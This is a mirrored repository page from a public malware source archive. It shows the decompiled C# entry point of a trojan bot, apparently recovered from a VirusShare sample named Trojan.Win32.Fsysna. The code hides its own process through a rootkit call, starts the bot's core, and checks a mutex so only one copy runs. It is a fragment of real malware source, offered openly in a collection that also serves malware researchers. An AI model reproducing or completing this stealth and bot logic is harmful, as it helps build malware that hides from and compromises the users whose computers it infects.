mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
f2ac1ece55
add
29 lines
793 B
C#
29 lines
793 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Hearding_Bot.Program
|
|
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
|
|
|
|
using System;
|
|
using System.Diagnostics;
|
|
|
|
namespace Hearding_Bot
|
|
{
|
|
internal class Program
|
|
{
|
|
public static void Main(string[] args)
|
|
{
|
|
rootkit.HideProcess(Process.GetCurrentProcess());
|
|
Core core = new Core();
|
|
Program.checkMutex();
|
|
}
|
|
|
|
private static void checkMutex()
|
|
{
|
|
if (!new InstanceUnique(Config.mutex).IsRunning())
|
|
return;
|
|
Environment.Exit(0);
|
|
}
|
|
}
|
|
}
|